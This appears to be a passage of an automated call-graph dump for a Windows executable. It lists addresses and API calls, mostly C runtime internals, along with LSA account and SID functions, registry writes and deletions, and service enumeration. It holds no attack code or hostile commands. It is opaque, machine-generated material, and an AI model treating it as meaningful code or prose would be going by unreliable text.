10660->10661 10662 416117 10660->10662 10663 4145cc __lock 67 API calls 10661->10663 10664 416431 __getptd 67 API calls 10662->10664 10665 41613a 10663->10665 10666 41611c 10664->10666 10688 4160b6 10665->10688 10669 41612a __mtinitlocknum 10666->10669 10671 4136a9 __amsg_exit 67 API calls 10666->10671 10669->10648 10671->10669 10673 415994 __mtinitlocknum 10672->10673 10674 416431 __getptd 67 API calls 10673->10674 10675 415999 10674->10675 10676 4145cc __lock 67 API calls 10675->10676 10677 4159ab 10675->10677 10678 4159c9 10676->10678 10679 4159b9 __mtinitlocknum 10677->10679 10681 4136a9 __amsg_exit 67 API calls 10677->10681 10680 415a12 10678->10680 10683 4159e0 InterlockedDecrement 10678->10683 10684 4159fa InterlockedIncrement 10678->10684 10679->10649 10856 415a23 10680->10856 10681->10679 10683->10684 10685 4159eb 10683->10685 10684->10680 10685->10684 10686 414190 __mtinitlocknum 67 API calls 10685->10686 10687 4159f9 10686->10687 10687->10684 10689 4160ba 10688->10689 10690 4160ec 10688->10690 10689->10690 10691 415f8e ___addlocaleref 8 API calls 10689->10691 10696 41615e 10690->10696 10692 4160cd 10691->10692 10692->10690 10699 41601d 10692->10699 10855 4144f2 LeaveCriticalSection 10696->10855 10698 416165 10698->10666 10700 4160b1 10699->10700 10701 41602e InterlockedDecrement 10699->10701 10700->10690 10713 415e45 10700->10713 10702 416043 InterlockedDecrement 10701->10702 10703 416046 10701->10703 10702->10703 10704 416050 InterlockedDecrement 10703->10704 10705 416053 10703->10705 10704->10705 10706 416060 10705->10706 10707 41605d InterlockedDecrement 10705->10707 10708 41606a InterlockedDecrement 10706->10708 10709 41606d 10706->10709 10707->10706 10708->10709 10710 416086 InterlockedDecrement 10709->10710 10711 416096 InterlockedDecrement 10709->10711 10712 4160a1 InterlockedDecrement 10709->10712 10710->10709 10711->10709 10712->10700 10714 415e5c 10713->10714 10715 415ec9 10713->10715 10714->10715 10719 415e90 10714->10719 10725 414190 __mtinitlocknum 67 API calls 10714->10725 10716 414190 __mtinitlocknum 67 API calls 10715->10716 10717 415f16 10715->10717 10720 415eea 10716->10720 10729 415f3d 10717->10729 10767 41b093 10717->10767 10722 415eb1 10719->10722 10732 414190 __mtinitlocknum 67 API calls 10719->10732 10723 414190 __mtinitlocknum 67 API calls 10720->10723 10728 414190 __mtinitlocknum 67 API calls 10722->10728 10727 415efd 10723->10727 10724 414190 __mtinitlocknum 67 API calls 10724->10729 10730 415e85 10725->10730 10726 415f82 10731 414190 __mtinitlocknum 67 API calls 10726->10731 10733 414190 __mtinitlocknum 67 API calls 10727->10733 10734 415ebe 10728->10734 10729->10726 10740 414190 67 API calls __mtinitlocknum 10729->10740 10743 41b26d 10730->10743 10737 415f88 10731->10737 10738 415ea6 10732->10738 10739 415f0b 10733->10739 10735 414190 __mtinitlocknum 67 API calls 10734->10735 10735->10715 10737->10690 10759 41b228 10738->10759 10742 414190 __mtinitlocknum 67 API calls 10739->10742 10740->10729 10742->10717 10744 41b27a 10743->10744 10758 41b2f7 10743->10758 10745 41b28b 10744->10745 10746 414190 __mtinitlocknum 67 API calls 10744->10746 10747 41b29d 10745->10747 10748 414190 __mtinitlocknum 67 API calls 10745->10748 10746->10745 10749 41b2af 10747->10749 10750 414190 __mtinitlocknum 67 API calls 10747->10750 10748->10747 10751 41b2c1 10749->10751 10752 414190 __mtinitlocknum 67 API calls 10749->10752 10750->10749 10753 414190 __mtinitlocknum 67 API calls 10751->10753 10755 41b2d3 10751->10755 10752->10751 10753->10755 10754 41b2e5 10757 414190 __mtinitlocknum 67 API calls 10754->10757 10754->10758 10755->10754 10756 414190 __mtinitlocknum 67 API calls 10755->10756 10756->10754 10757->10758 10758->10719 10761 41b235 10759->10761 10766 41b269 10759->10766 10760 41b245 10763 41b257 10760->10763 10764 414190 __mtinitlocknum 67 API calls 10760->10764 10761->10760 10762 414190 __mtinitlocknum 67 API calls 10761->10762 10762->10760 10765 414190 __mtinitlocknum 67 API calls 10763->10765 10763->10766 10764->10763 10765->10766 10766->10722 10768 41b0a4 10767->10768 10854 415f36 10767->10854 10769 414190 __mtinitlocknum 67 API calls 10768->10769 10770 41b0ac 10769->10770 10771 414190 __mtinitlocknum 67 API calls 10770->10771 10772 41b0b4 10771->10772 10773 414190 __mtinitlocknum 67 API calls 10772->10773 10774 41b0bc 10773->10774 10775 414190 __mtinitlocknum 67 API calls 10774->10775 10776 41b0c4 10775->10776 10777 414190 __mtinitlocknum 67 API calls 10776->10777 10778 41b0cc 10777->10778 10779 414190 __mtinitlocknum 67 API calls 10778->10779 10780 41b0d4 10779->10780 10781 414190 __mtinitlocknum 67 API calls 10780->10781 10782 41b0db 10781->10782 10783 414190 __mtinitlocknum 67 API calls 10782->10783 10784 41b0e3 10783->10784 10785 414190 __mtinitlocknum 67 API calls 10784->10785 10786 41b0eb 10785->10786 10787 414190 __mtinitlocknum 67 API calls 10786->10787 10788 41b0f3 10787->10788 10789 414190 __mtinitlocknum 67 API calls 10788->10789 10790 41b0fb 10789->10790 10791 414190 __mtinitlocknum 67 API calls 10790->10791 10792 41b103 10791->10792 10793 414190 __mtinitlocknum 67 API calls 10792->10793 10794 41b10b 10793->10794 10795 414190 __mtinitlocknum 67 API calls 10794->10795 10796 41b113 10795->10796 10797 414190 __mtinitlocknum 67 API calls 10796->10797 10798 41b11b 10797->10798 10799 414190 __mtinitlocknum 67 API calls 10798->10799 10800 41b123 10799->10800 10801 414190 __mtinitlocknum 67 API calls 10800->10801 10802 41b12e 10801->10802 10803 414190 __mtinitlocknum 67 API calls 10802->10803 10804 41b136 10803->10804 10805 414190 __mtinitlocknum 67 API calls 10804->10805 10806 41b13e 10805->10806 10807 414190 __mtinitlocknum 67 API calls 10806->10807 10808 41b146 10807->10808 10809 414190 __mtinitlocknum 67 API calls 10808->10809 10810 41b14e 10809->10810 10811 414190 __mtinitlocknum 67 API calls 10810->10811 10812 41b156 10811->10812 10854->10724 10855->10698 10859 4144f2 LeaveCriticalSection 10856->10859 10858 415a2a 10858->10677 10859->10858 10861 401111 10860->10861 10862 4010e8 10860->10862 10863 412c36 __wcsnicmp 79 API calls 10861->10863 10935 401000 LsaOpenPolicy 10862->10935 10865 401120 10863->10865 10867 401173 GetComputerNameW 10865->10867 10868 401127 GetProcessHeap HeapAlloc 10865->10868 10866 4010f4 10866->10861 10869 4010fb 10866->10869 10871 401190 10867->10871 10875 4011c3 __flswbuf 10868->10875 10876 40115f 10868->10876 10942 412cdc 10869->10942 10871->10871 10874 40119b GetProcessHeap HeapAlloc 10871->10874 10872 40110d 10872->10370 10874->10875 10877 40120d 10874->10877 10881 405470 109 API calls 10875->10881 10879 412760 ___sbh_free_block __VEC_memcpy 10876->10879 10878 412731 __snwprintf_s 101 API calls 10877->10878 10880 40116b LsaLookupNames GetProcessHeap HeapFree 10878->10880 10879->10880 10887 401290 10880->10887 10888 401286 LsaClose 10880->10888 10882 4011e0 10881->10882 10883 4011f5 10882->10883 10884 4011eb LsaClose 10882->10884 10886 412cdc __except_handler4 5 API calls 10883->10886 10884->10883 10889 401209 10886->10889 10890 401294 LsaFreeMemory LsaFreeMemory LsaNtStatusToWinError 10887->10890 10891 4012eb 10887->10891 10888->10887 10889->10370 10892 4052c0 107 API calls 10890->10892 10893 401331 10891->10893 10897 4012fb LsaFreeMemory LsaFreeMemory 10891->10897 10896 4012b4 __flswbuf 10892->10896 10894 401515 LsaFreeMemory LsaFreeMemory 10893->10894 10895 40134d IsValidSid 10893->10895 10899 401538 __flswbuf 10894->10899 10895->10894 10898 40135f GetSidSubAuthorityCount GetSidLengthRequired GetProcessHeap HeapAlloc 10895->10898 10904 405470 109 API calls 10896->10904 10900 40131e __flswbuf 10897->10900 10901 401390 LsaFreeMemory LsaFreeMemory 10898->10901 10902 4013dc GetSidIdentifierAuthority InitializeSid 10898->10902 10905 405470 109 API calls 10899->10905 10908 405470 109 API calls 10900->10908 10903 4013b8 __flswbuf 10901->10903 10906 401465 10902->10906 10907 4013fd GetLastError GetProcessHeap HeapFree LsaFreeMemory LsaFreeMemory 10902->10907 10913 405470 109 API calls 10903->10913 10910 4012d0 10904->10910 10911 401327 10905->10911 10909 401474 GetSidSubAuthority 10906->10909 10923 4014ae 10906->10923 10912 4052c0 107 API calls 10907->10912 10908->10911 10909->10906 10915 401488 GetSidSubAuthority 10909->10915 10914 412cdc __except_handler4 5 API calls 10910->10914 10919 412cdc __except_handler4 5 API calls 10911->10919 10916 40142e __flswbuf 10912->10916 10917 4013c1 10913->10917 10918 4012e7 10914->10918 10915->10906 10925 405470 109 API calls 10916->10925 10920 412cdc __except_handler4 5 API calls 10917->10920 10918->10370 10921 401558 10919->10921 10922 4013d8 10920->10922 10921->10370 10922->10370 10924 4014ec LsaFreeMemory LsaFreeMemory 10923->10924 10928 401070 2 API calls 10923->10928 10927 412cdc __except_handler4 5 API calls 10924->10927 10926 40144a 10925->10926 10929 412cdc __except_handler4 5 API calls 10926->10929 10930 401511 10927->10930 10932 4014c5 __flswbuf 10928->10932 10931 401461 10929->10931 10930->10370 10931->10370 10932->10924 10933 405470 109 API calls 10932->10933 10934 4014e4 10933->10934 10934->10924 10936 401065 10935->10936 10937 401036 LsaNtStatusToWinError 10935->10937 10936->10866 10938 4052c0 107 API calls 10937->10938 10939 401042 __flswbuf 10938->10939 10940 405470 109 API calls 10939->10940 10941 401059 10940->10941 10941->10866 10943 412ce4 10942->10943 10944 412ce6 IsDebuggerPresent 10942->10944 10943->10872 10950 41aa85 10944->10950 10947 416889 SetUnhandledExceptionFilter UnhandledExceptionFilter 10948 4168a6 __invoke_watson 10947->10948 10949 4168ae GetCurrentProcess TerminateProcess 10947->10949 10948->10949 10949->10872 10950->10947 10952 4053a1 FormatMessageW 10951->10952 10953 4053ee 10951->10953 10952->10953 10954 4053ba GetProcessHeap HeapAlloc 10952->10954 10953->10033 10955 412731 __snwprintf_s 101 API calls 10954->10955 10956 4053e1 10955->10956 10956->10033 10956->10953 10960 412d9a 10957->10960 10959 405494 LocalFree 10959->10034 10961 412da6 __mtinitlocknum 10960->10961 10962 412db6 10961->10962 10964 412ddf 10961->10964 10963 4154f0 __mtinitlocknum 67 API calls 10962->10963 10965 412dbb 10963->10965 10975 412653 10964->10975 10967 415488 _strcpy_s 6 API calls 10965->10967 10971 412dcb __mtinitlocknum 10967->10971 10971->10959 10976 412665 10975->10976 10977 412687 EnterCriticalSection 10975->10977 10976->10977 10978 41266d 10976->10978 10979 41267d 10977->10979 10980 4145cc __lock 67 API calls 10978->10980 10981 4169a8 10979->10981 10980->10979 10997 413b64 10981->10997 10985 4169bd __flswbuf 10986 412df2 10985->10986 10987 416a04 10985->10987 10990 416a44 10986->10990 10988 4140b1 __malloc_crt 67 API calls 10987->10988 10989 416a0a 10988->10989 10989->10986 10991 416a4f 10990->10991 10993 412e0b 10990->10993 10991->10993 11012 4142bd 10991->11012 10994 412e23 10993->10994 11164 4126c6 10994->11164 10996 412e2b 10996->10971 10998 413b73 10997->10998 11000 413b88 10997->11000 10999 4154f0 __mtinitlocknum 67 API calls 10998->10999 11001 413b78 10999->11001 11003 41a6b2 11000->11003 11002 415488 _strcpy_s 6 API calls 11001->11002 11002->11000 11004 41a6bf 11003->11004 11005 41a6ce 11003->11005 11006 4154f0 __mtinitlocknum 67 API calls 11004->11006 11008 41a6f2 11005->11008 11009 4154f0 __mtinitlocknum 67 API calls 11005->11009 11007 41a6c4 11006->11007 11007->10985 11008->10985 11010 41a6e2 11009->11010 11011 415488 _strcpy_s 6 API calls 11010->11011 11011->11008 11013 4142f8 11012->11013 11014 4142d6 11012->11014 11013->10993 11014->11013 11015 413b64 __fileno 67 API calls 11014->11015 11016 4142f1 11015->11016 11018 41a30e 11016->11018 11019 41a31a __mtinitlocknum 11018->11019 11020 41a322 11019->11020 11021 41a33d 11019->11021 11119 415503 11020->11119 11023 41a34b 11021->11023 11028 41a38c 11021->11028 11025 415503 __free_osfhnd 67 API calls 11023->11025 11027 41a350 11025->11027 11026 4154f0 __mtinitlocknum 67 API calls 11038 41a32f __mtinitlocknum 11026->11038 11030 4154f0 __mtinitlocknum 67 API calls 11027->11030 11043 4186bb 11028->11043 11032 41a357 11030->11032 11031 41a392 11033 41a3b5 11031->11033 11034 41a39f 11031->11034 11035 415488 _strcpy_s 6 API calls 11032->11035 11037 4154f0 __mtinitlocknum 67 API calls 11033->11037 11053 419bdb 11034->11053 11035->11038 11040 41a3ba 11037->11040 11038->11013 11039 41a3ad 11122 41a3e0 11039->11122 11041 415503 __free_osfhnd 67 API calls 11040->11041 11041->11039 11044 4186c7 __mtinitlocknum 11043->11044 11045 418722 11044->11045 11047 4145cc __lock 67 API calls 11044->11047 11046 418727 EnterCriticalSection 11045->11046 11049 418744 __mtinitlocknum 11045->11049 11046->11049 11048 4186f3 11047->11048 11050 418527 __mtinitlocknum InitializeCriticalSectionAndSpinCount 11048->11050 11052 41870a 11048->11052 11049->11031 11050->11052 11125 418752 11052->11125 11054 419bea __write_nolock 11053->11054 11055 419c43 11054->11055 11056 419c1c 11054->11056 11104 419c11 11054->11104 11061 419cab 11055->11061 11062 419c85 11055->11062 11058 415503 __free_osfhnd 67 API calls 11056->11058 11057 412cdc __except_handler4 5 API calls 11059 41a30c 11057->11059 11060 419c21 11058->11060 11059->11039 11066 4154f0 __mtinitlocknum 67 API calls 11060->11066 11064 419cb1 11061->11064 11065 419cc2 11061->11065 11063 415503 __free_osfhnd 67 API calls 11062->11063 11067 419c8a 11063->11067 11129 41a4cb 11064->11129 11070 41a6b2 __write_nolock 67 API calls 11065->11070 11069 419c28 11066->11069 11071 4154f0 __mtinitlocknum 67 API calls 11067->11071 11073 415488 _strcpy_s 6 API calls 11069->11073 11074 419cca 11070->11074 11075 419c93 11071->11075 11073->11104 11076 419f70 11074->11076 11080 416431 __getptd 67 API calls 11074->11080 11077 415488 _strcpy_s 6 API calls 11075->11077 11078 419f80 11076->11078 11079 41a23f WriteFile 11076->11079 11077->11104 11083 419f94 11078->11083 11084 41a05e 11078->11084 11082 41a272 GetLastError 11079->11082 11109 41a059 11079->11109 11081 419ce5 GetConsoleMode 11080->11081 11081->11076 11085 419d10 11081->11085 11088 419f52 11082->11088 11087 41a2bd 11083->11087 11091 41a002 WriteFile 11083->11091 11097 41a06d 11084->11097 11101 41a13e 11084->11101 11085->11076 11086 419d22 GetConsoleCP 11085->11086 11086->11088 11116 419d45 11086->11116 11089 4154f0 __mtinitlocknum 67 API calls 11087->11089 11087->11104 11088->11087 11090 41a290 11088->11090 11088->11104 11092 41a2e0 11089->11092 11094 41a29b 11090->11094 11095 41a2af 11090->11095 11091->11082 11099 419fa5 11091->11099 11100 415503 __free_osfhnd 67 API calls 11092->11100 11093 41a1a4 WideCharToMultiByte 11093->11082 11103 41a1db WriteFile 11093->11103 11102 4154f0 __mtinitlocknum 67 API calls 11094->11102 11142 415516 11095->11142 11096 41a0e2 WriteFile 11096->11082 11105 41a078 11096->11105 11097->11087 11097->11096 11099->11083 11099->11088 11099->11109 11100->11104 11101->11087 11101->11093 11107 41a2a0 11102->11107 11106 41a212 GetLastError 11103->11106 11112 41a206 11103->11112 11104->11057 11105->11088 11105->11097 11105->11109 11106->11112 11110 415503 __free_osfhnd 67 API calls 11107->11110 11109->11088 11110->11104 11111 41a9ca 79 API calls __fassign 11111->11116 11112->11088 11112->11101 11112->11103 11112->11109 11113 41c0a3 11 API calls __putwch_nolock 11113->11116 11114 419df1 WideCharToMultiByte 11114->11088 11115 419e22 WriteFile 11114->11115 11115->11082 11118 419e49 11115->11118 11116->11082 11116->11088 11116->11111 11116->11113 11116->11114 11139 417923 11116->11139 11117 419e76 WriteFile 11117->11082 11117->11118 11118->11088 11118->11116 11118->11117 11120 4163b8 __getptd_noexit 67 API calls 11119->11120 11121 415508 11120->11121 11121->11026 11163 41875b LeaveCriticalSection 11122->11163 11124 41a3e8 11124->11038 11128 4144f2 LeaveCriticalSection 11125->11128 11127 418759 11127->11045 11128->11127 11147 418644 11129->11147 11131 41a4e9 11132 41a4f1 11131->11132 11133 41a502 SetFilePointer 11131->11133 11134 4154f0 __mtinitlocknum 67 API calls 11132->11134 11135 41a51a GetLastError 11133->11135 11136 419cbf 11133->11136 11134->11136 11135->11136 11137 41a524 11135->11137 11136->11065 11138 415516 __dosmaperr 67 API calls 11137->11138 11138->11136 11160 4178eb 11139->11160 11143 415503 __free_osfhnd 67 API calls 11142->11143 11144 415521 __dosmaperr 11143->11144 11145 4154f0 __mtinitlocknum 67 API calls 11144->11145 11146 415534 11145->11146 11146->11104 11148 418651 11147->11148 11149 418669 11147->11149 11150 415503 __free_osfhnd 67 API calls 11148->11150 11151 415503 __free_osfhnd 67 API calls 11149->11151 11157 4186ae 11149->11157 11152 418656 11150->11152 11154 418697 11151->11154 11153 4154f0 __mtinitlocknum 67 API calls 11152->11153 11155 41865e 11153->11155 11156 4154f0 __mtinitlocknum 67 API calls 11154->11156 11155->11131 11158 41869e 11156->11158 11157->11131 11159 415488 _strcpy_s 6 API calls 11158->11159 11159->11157 11161 412ac5 _LocaleUpdate::_LocaleUpdate 77 API calls 11160->11161 11162 4178fe 11161->11162 11162->11116 11163->11124 11165 4126d7 11164->11165 11166 4126f6 LeaveCriticalSection 11164->11166 11165->11166 11167 4126de 11165->11167 11166->10996 11170 4144f2 LeaveCriticalSection 11167->11170 11169 4126f3 11169->10996 11170->11169 11172 412f51 11171->11172 11174 412f71 11171->11174 11173 4154f0 __mtinitlocknum 67 API calls 11172->11173 11175 412f56 11173->11175 11176 412f7f 11174->11176 11179 412fa6 11174->11179 11178 415488 _strcpy_s 6 API calls 11175->11178 11177 4154f0 __mtinitlocknum 67 API calls 11176->11177 11182 41274d 11176->11182 11180 412f9b 11177->11180 11178->11182 11181 4154f0 __mtinitlocknum 67 API calls 11179->11181 11184 415488 _strcpy_s 6 API calls 11180->11184 11183 412fab 11181->11183 11182->9973 11185 412fe6 11183->11185 11186 412fb9 11183->11186 11184->11182 11188 412e4c __vswprintf_helper 101 API calls 11185->11188 11201 412e4c 11186->11201 11189 412ff4 11188->11189 11192 413009 11189->11192 11196 41301c 11189->11196 11191 412fd3 11193 4154f0 __mtinitlocknum 67 API calls 11191->11193 11194 4154f0 __mtinitlocknum 67 API calls 11192->11194 11195 412fd8 11193->11195 11197 41300e 11194->11197 11195->11182 11198 4154f0 __mtinitlocknum 67 API calls 11195->11198 11196->11182 11199 4154f0 __mtinitlocknum 67 API calls 11196->11199 11197->11182 11200 4154f0 __mtinitlocknum 67 API calls 11197->11200 11198->11182 11199->11180 11200->11182 11202 412e7c 11201->11202 11203 412e5c 11201->11203 11206 412e8c 11202->11206 11212 412eac 11202->11212 11204 4154f0 __mtinitlocknum 67 API calls 11203->11204 11205 412e61 11204->11205 11207 415488 _strcpy_s 6 API calls 11205->11207 11208 4154f0 __mtinitlocknum 67 API calls 11206->11208 11214 412e71 11207->11214 11209 412e91 11208->11209 11210 415488 _strcpy_s 6 API calls 11209->11210 11210->11214 11211 412ef3 11211->11214 11215 4145ff __flsbuf 101 API calls 11211->11215 11212->11211 11212->11214 11216 4145ff 11212->11216 11214->11191 11214->11196 11215->11214 11217 413b64 __fileno 67 API calls 11216->11217 11218 41460f 11217->11218 11219 414631 11218->11219 11220 41461a 11218->11220 11221 414635 11219->11221 11226 414642 __flswbuf 11219->11226 11222 4154f0 __mtinitlocknum 67 API calls 11220->11222 11223 4154f0 __mtinitlocknum 67 API calls 11221->11223 11231 41461f 11222->11231 11223->11231 11224 414732 11227 41a30e __locking 101 API calls 11224->11227 11225 4146b2 11228 4146e6 11225->11228 11229 4146c9 11225->11229 11226->11231 11232 41a6b2 __write_nolock 67 API calls 11226->11232 11233 414698 11226->11233 11236 4146a3 11226->11236 11227->11231 11228->11231 11240 41a550 11228->11240 11230 41a30e __locking 101 API calls 11229->11230 11230->11231 11231->11211 11232->11233 11233->11236 11237 41a669 11233->11237 11236->11224 11236->11225 11238 4140b1 __malloc_crt 67 API calls 11237->11238 11239 41a67e 11238->11239 11239->11236 11241 41a55c __mtinitlocknum 11240->11241 11242 41a589 11241->11242 11243 41a56d 11241->11243 11245 41a597 11242->11245 11247 41a5b8 11242->11247 11244 415503 __free_osfhnd 67 API calls 11243->11244 11246 41a572 11244->11246 11248 415503 __free_osfhnd 67 API calls 11245->11248 11249 4154f0 __mtinitlocknum 67 API calls 11246->11249 11251 41a5d8 11247->11251 11252 41a5fe 11247->11252 11250 41a59c 11248->11250 11254 41a57a __mtinitlocknum 11249->11254 11256 4154f0 __mtinitlocknum 67 API calls 11250->11256 11253 415503 __free_osfhnd 67 API calls 11251->11253 11255 4186bb ___lock_fhandle 68 API calls 11252->11255 11257 41a5dd 11253->11257 11254->11231 11258 41a604 11255->11258 11259 41a5a3 11256->11259 11260 4154f0 __mtinitlocknum 67 API calls 11257->11260 11261 41a611 11258->11261 11262 41a62d 11258->11262 11263 415488 _strcpy_s 6 API calls 11259->11263 11264 41a5e4 11260->11264 11265 41a4cb __lseeki64_nolock 69 API calls 11261->11265 11266 4154f0 __mtinitlocknum 67 API calls 11262->11266 11263->11254 11267 415488 _strcpy_s 6 API calls 11264->11267 11268 41a622 11265->11268 11269 41a632 11266->11269 11267->11254 11272 41a65f 11268->11272 11270 415503 __free_osfhnd 67 API calls 11269->11270 11270->11268 11275 41875b LeaveCriticalSection 11272->11275 11274 41a667 11274->11254 11275->11274 11277 40ca9b 11276->11277 11278 40ca86 11276->11278 11277->10120 11277->10129 11278->11277 11279 405400 3 API calls 11278->11279 11279->11277 11282 413ba2 __mtinitlocknum 11280->11282 11281 413bb2 11284 4154f0 __mtinitlocknum 67 API calls 11281->11284 11282->11281 11283 413bdb 11282->11283 11285 412653 __lock_file 68 API calls 11283->11285 11286 413bb7 11284->11286 11287 413be4 11285->11287 11288 415488 _strcpy_s 6 API calls 11286->11288 11289 4169a8 __stbuf 67 API calls 11287->11289 11291 413bc7 __mtinitlocknum 11288->11291 11290 413bee 11289->11290 11292 416a44 __ftbuf 101 API calls 11290->11292 11291->10115 11293 413c08 11292->11293 11325 413c20 11293->11325 11296 40cb41 GetLastError 11295->11296 11297 40cafb 11295->11297 11298 40cb50 GetLastError 11296->11298 11299 40cb79 11296->11299 11300 40cb03 GetServiceDisplayNameW GetServiceKeyNameW 11297->11300 11301 40cb3a 11297->11301 11302 4052c0 107 API calls 11298->11302 11299->11298 11303 40cb7d EnumServicesStatusW GetLastError 11299->11303 11300->11301 11306 412cdc __except_handler4 5 API calls 11301->11306 11312 40cb58 __flswbuf 11302->11312 11304 40cbb0 GetProcessHeap HeapAlloc 11303->11304 11305 40cc82 GetLastError 11303->11305 11307 40cbca __flswbuf 11304->11307 11317 40cbf1 11304->11317 11309 4052c0 107 API calls 11305->11309 11308 40cd27 11306->11308 11313 405470 109 API calls 11307->11313 11308->10162 11309->11312 11310 40cc00 EnumServicesStatusW 11311 40cc2a GetLastError 11310->11311 11310->11317 11314 40cc72 GetProcessHeap HeapFree 11311->11314 11311->11317 11315 405470 109 API calls 11312->11315 11313->11301 11314->11305 11315->11301 11316 40ccfb 11319 40cab0 117 API calls 11316->11319 11317->11310 11317->11316 11318 4097b0 79 API calls 11317->11318 11320 40cc98 11317->11320 11318->11317 11319->11301 11321 412731 __snwprintf_s 101 API calls 11320->11321 11322 40ccb9 11321->11322 11323 40ccc3 GetProcessHeap HeapFree 11322->11323 11324 40ccdf GetProcessHeap HeapFree 11322->11324 11323->11324 11324->11316 11326 4126c6 _fwprintf 2 API calls 11325->11326 11327 413c28 11326->11327 11327->11291 11404 40b310 11328->11404 11330 40b451 11330->10185 11331 40af10 11330->11331 11429 40ae90 11331->11429 11333 40af26 11333->10188 11333->10189 11335 40af50 11334->11335 11336 40af52 GetLastError 11334->11336 11335->10201 11337 4052c0 107 API calls 11336->11337 11338 40af60 11337->11338 11339 405400 3 API calls 11338->11339 11340 40af71 11339->11340 11340->10201 11342 40c61e 11341->11342 11344 40c62a 11341->11344 11342->10208 11343 40c63a 11343->10208 11344->11343 11345 40c6d3 GetProcessHeap HeapAlloc 11344->11345 11346 40c7b3 11345->11346 11349 40c70a 11345->11349 11346->10208 11347 412731 101 API calls __snwprintf_s 11347->11349 11348 40c7c0 GetProcessHeap HeapFree 11348->10208 11349->11346 11349->11347 11349->11348 11350 40c7ef GetProcessHeap HeapFree 11349->11350 11350->10208 11352 412731 __snwprintf_s 101 API calls 11351->11352 11353 40a9ff 11352->11353 11354 40aa06 11353->11354 11355 40aa3c RegCreateKeyExW 11353->11355 11358 405400 3 API calls 11354->11358 11356 40aa67 GetLastError 11355->11356 11357 40aaa8 11355->11357 11360 4052c0 107 API calls 11356->11360 11363 40aab9 RegCloseKey 11357->11363 11364 40aadb RegSetValueExW 11357->11364 11359 40aa1e 11358->11359 11361 412cdc __except_handler4 5 API calls 11359->11361 11362 40aa75 11360->11362 11365 40aa35 11361->11365 11366 405400 3 API calls 11362->11366 11370 412cdc __except_handler4 5 API calls 11363->11370 11364->11363 11368 40aafa GetLastError 11364->11368 11365->10221 11369 40aa8a 11366->11369 11371 4052c0 107 API calls 11368->11371 11372 412cdc __except_handler4 5 API calls 11369->11372 11373 40ab62 11370->11373 11374 40ab08 11371->11374 11375 40aaa1 11372->11375 11373->10221 11376 405400 3 API calls 11374->11376 11375->10221 11377 40ab1d RegCloseKey 11376->11377 11378 412cdc __except_handler4 5 API calls 11377->11378 11379 40ab3f 11378->11379 11379->10221 11381 412731 __snwprintf_s 101 API calls 11380->11381 11382 408781 11381->11382 11383 4087b5 11382->11383 11384 408788 11382->11384 11386 40af30 112 API calls 11383->11386 11385 405400 3 API calls 11384->11385 11387 40879c 11385->11387 11388 4087c5 11386->11388 11389 412cdc __except_handler4 5 API calls 11387->11389 11390 412cdc __except_handler4 5 API calls 11388->11390 11391 4087b1 11389->11391 11392 4087d5 11390->11392 11391->10264 11392->10264 11394 412731 __snwprintf_s 101 API calls 11393->11394 11395 408811 11394->11395 11396 408845 RegDeleteValueW 11395->11396 11397 408818 11395->11397 11399 412cdc __except_handler4 5 API calls 11396->11399 11398 405400 3 API calls 11397->11398 11400 40882c 11398->11400 11401 408863 11399->11401 11402 412cdc __except_handler4 5 API calls 11400->11402 11401->10264 11403 408841 11402->11403 11403->10264 11405 40b353 11404->11405 11406 40b336 11404->11406 11408 412731 __snwprintf_s 101 API calls 11405->11408 11407 412731 __snwprintf_s 101 API calls 11406->11407 11409 40b34e 11407->11409 11408->11409 11410 40b371 11409->11410 11411 40b3a3 11409->11411 11412 405400 3 API calls 11410->11412 11413 40b411 RegOpenKeyExW 11411->11413 11414 40b3b4 RegCreateKeyExW 11411->11414 11416 40b389 11412->11416 11415 40b3d0 11413->11415 11414->11415 11417 40b3d4 GetLastError 11415->11417 11418 40b427 11415->11418 11419 412cdc __except_handler4 5 API calls 11416->11419 11420 4052c0 107 API calls 11417->11420 11421 412cdc __except_handler4 5 API calls 11418->11421 11422 40b39c 11419->11422 11423 40b3e2 11420->11423 11424 40b438 11421->11424 11422->11330 11425 405400 3 API calls 11423->11425 11424->11330 11426 40b3f7 11425->11426 11427 412cdc __except_handler4 5 API calls 11426->11427 11428 40b40a 11427->11428 11428->11330 11430 40aea0 11429->11430 11430->11430 11431 40aeab RegSetValueExW 11430->11431 11432 40aed6 11431->11432 11433 40aed8 GetLastError 11431->11433 11432->11333 11434 4052c0 107 API calls 11433->11434 11435 40aee6 11434->11435 11436 405400 3 API calls 11435->11436 11437 40aef7 11436->11437 11437->11333 13410 418161 13411 418164 13410->13411 13414 41bd69 13411->13414 13415 41bd88 13414->13415 13419 41bd8f 13414->13419 13416 417c53 __NMSG_WRITE 67 API calls 13415->13416 13416->13419 13426 41833d 13419->13426 13420 41bda0 _memset 13422 41be78 13420->13422 13424 41be38 SetUnhandledExceptionFilter UnhandledExceptionFilter 13420->13424 13450 41392f 13422->13450 13424->13422 13427 4161e5 __decode_pointer 6 API calls 13426->13427 13428 418348 13427->13428 13428->13420 13429 41834a 13428->13429 13430 418356 __mtinitlocknum 13429->13430 13431 4183b2 13430->13431 13432 41837d 13430->13432 13433 418393 13430->13433 13438 418379 13430->13438 13431->13433 13435 4183c1 13431->13435 13434 4163b8 __getptd_noexit 67 API calls 13432->13434 13436 4161e5 __decode_pointer 6 API calls 13433->13436 13439 418382 _siglookup 13434->13439 13437 4154f0 __mtinitlocknum 67 API calls 13435->13437 13436->13439 13440 4183c6 13437->13440 13438->13432 13438->13435 13442 418428 13439->13442 13443 41392f _abort 67 API calls 13439->13443 13449 41838b __mtinitlocknum 13439->13449 13441 415488 _strcpy_s 6 API calls 13440->13441 13441->13449 13444 4145cc __lock 67 API calls 13442->13444 13445 418433 13442->13445 13443->13442 13444->13445 13446 4161dc ___crtMessageBoxW 6 API calls 13445->13446 13447 418468 13445->13447 13446->13447 13453 4184be 13447->13453 13449->13420 13451 4137ed _doexit 67 API calls 13450->13451 13452 413940 13451->13452 13454 4184c4 13453->13454 13455 4184cb 13453->13455 13457 4144f2 LeaveCriticalSection 13454->13457 13455->13449 13457->13455 13137 41ca64 13138 41ca75 13137->13138 13139 41ca7d 13137->13139 13138->13139 13140 41ca7a FindCloseChangeNotification 13138->13140 13141 41ca8f 13139->13141 13142 41ca8c CloseHandle 13139->13142 13140->13139 13142->13141 11438 40ca70 OpenSCManagerW 11439 40ca9b 11438->11439 11440 40ca86 11438->11440 11440->11439 11441 405400 3 API calls 11440->11441 11441->11439 11499 413d02 11500 413d0e __mtinitlocknum 11499->11500 11540 418b0c HeapCreate 11500->11540 11503 413d6b 11542 41657a GetModuleHandleW 11503->11542 11507 413d7c __RTC_Initialize 11576 413e5d 11507->11576 11508 413cd9 _fast_error_exit 67 API calls 